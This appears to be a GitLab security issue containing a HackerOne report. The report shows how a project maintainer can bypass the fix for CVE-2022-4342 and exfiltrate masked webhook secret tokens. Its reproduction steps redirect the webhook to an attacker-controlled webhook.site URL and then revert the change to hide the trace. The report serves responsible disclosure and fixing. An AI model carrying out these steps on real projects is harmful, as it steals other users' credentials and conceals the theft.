CVE-2022-4342 Bypassed - Maintainer can leak masked webhook secrets by changing target URL of the webhook

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1915507 by theluci on 2023-03-23, assigned to @ottilia_westerlund:

Report | Attachments | How To Reproduce

Report

Hello, I found that CVE-2022-4342 which was fixed in version 15.7.2 can be bypassed. And a malicious maintainer can leak masked webhook secrets by changing target URL of the webhook.

Summary

There is an option to mask parts of a webhook URL to treat it as a secret value.
https://docs.gitlab.com/ee/user/project/integrations/webhooks.html#mask-sensitive-portions-of-webhook-urls

When this feature is used any secret string in the configured URL will be masked in the UI and in any logs in the UI. The values work the same as other tokens in that they are not even accessible by the user configuring it after it is first configured. It should not be possible for the initial user or any other users to retrieve these values.

The docs states this about the secret

Sensitive portions do not get logged and are encrypted at rest in the database.

However, there is a way to leak masked webhook secrets by masking the attacker controlled server url itself. (see Steps/POC)

POC

CVE-2022-4342_Bypassed.mp4

Steps to reproduce on Gitlab.com

victim is the owner of a project project-victim
attacker is a maintainer in project-victim

1. victim goes to his project-victim webhook settings,https://gitlab.com/GROUP/PROJECT/-/hooks
2. victim configures a webhook with a secret token and mask the secret token. For example, Put the URL like this https://example.com?token=secret-token
3. Click to add a mask, add the value secret-token with the replacement token. Click save for the webhook

4. attacker goes to project-victim webhook settings,https://gitlab.com/GROUP/PROJECT/-/hooks

5. Scroll to the bottom of the page to the list of configured hooks and edit the webhook.

6. attacker edit the url to an "attacker controlled server" (i used https://webhook.site to catch the request). Keep the token={token} part. Like this `https://WEBHOOK.SITE?token={TOKEN} and mask the URL of the attacker controlled server as shown in the image

7. click save
8. click test
9. check your server to see that the request is sent to the new URL and containing the secret token

10. attacker can remove the trace by changing the url back to the original url

Impact

Maintainers can leak secret masked values that should not be accessible after configuration.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• CVE-2022-4342_Bypassed.mp4
• a0.png
• a2.png
• a1.png

How To Reproduce

Please add reproducibility information to this section: